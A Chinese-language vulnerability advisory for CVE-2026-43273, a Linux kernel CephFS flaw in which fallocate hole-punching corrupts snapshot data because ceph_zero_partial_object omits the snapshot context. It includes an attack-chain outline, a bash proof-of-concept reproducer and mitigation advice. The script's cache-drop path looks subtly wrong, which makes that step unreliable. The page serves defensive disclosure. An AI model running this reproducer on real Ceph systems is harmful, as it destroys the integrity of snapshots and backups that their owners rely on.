CVE-2026-43273 CVSS 5.5 中危

CVE-2026-43273 Linux内核Ceph快照数据不一致漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43273

漏洞类型

数据损坏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的Ceph文件系统模块存在一处安全漏洞，源于`ceph_zero_partial_object`函数在处理OSD写操作时未正确提供快照上下文。当用户对已创建快照的文件执行`fallocate`打洞操作时，由于缺少快照上下文保护，原始快照中的数据可能被意外修改。这导致快照的数据完整性受损，引发数据不一致，严重影响了文件系统的可靠性。

技术细节

该漏洞发生在Linux内核的Ceph客户端代码中。在Ceph文件系统中，快照技术用于保存文件系统的特定状态。当对文件执行部分清零（如使用`fallocate -p`）时，系统会调用`ceph_zero_partial_object`函数。正常情况下，写操作应携带快照上下文，以确保不会修改已存在的快照数据。然而，该漏洞函数在发送写请求给OSD时遗漏了此上下文。

利用方式：攻击者需具有本地低权限。首先挂载CephFS，写入数据并创建快照。随后，对原文件执行`fallocate -p`操作以打洞。由于缺少快照上下文，OSD会错误地修改本应受保护的快照数据。清空缓存后，再次读取快照文件，会发现其内容或哈希值已改变，证实数据被破坏。这可能导致依赖快照进行备份或恢复的系统出现严重故障。

攻击链分析

STEP 1

环境准备

攻击者需拥有本地访问权限，并在系统上配置并挂载Ceph文件系统（CephFS）。

STEP 2

创建快照

在挂载的文件系统中写入随机数据文件，并创建该文件系统的快照以保存初始状态。

STEP 3

触发漏洞

对原文件执行`fallocate -p`命令进行打洞操作，调用存在漏洞的`ceph_zero_partial_object`函数。

STEP 4

验证影响

清除系统缓存并计算快照中文件的哈希值，发现哈希值与原始值不同，确认快照数据被破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash # Reproducer for CVE-2026-43273 # Setup environment and mount CephFS ../src/vstart.sh --new -x --localhost --bluestore ./bin/ceph auth caps client.fs_a mds 'allow rwps fsname=a' mon 'allow r fsname=a' osd 'allow rw tag cephfs data=a' mount -t ceph [email protected]=/ /mnt/mycephfs/ -o conf=./ceph.conf # Write data and create snapshot dd if=/dev/urandom of=/mnt/mycephfs/foo bs=64K count=1 mkdir /mnt/mycephfs/.snap/snap1 md5sum /mnt/mycephfs/.snap/snap1/foo # Trigger vulnerability using fallocate to punch hole fallocate -p -o 0 -l 4096 /mnt/mycephfs/foo # Clear cache and verify data integrity echo 3 > /proc/sys/vm/drop/caches md5sum /mnt/mycephfs/.snap/snap1/foo # Expected: different md5sum indicating corruption

影响范围

Linux Kernel (修复前版本，具体见Git提交记录)

防御指南

临时缓解措施

建议限制对Ceph文件系统的非必要写操作权限，特别是限制普通用户使用`fallocate`等可能导致数据变更的系统调用。在没有升级内核前，管理员应谨慎使用Ceph快照功能，并定期校验备份数据的完整性以防止数据丢失。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表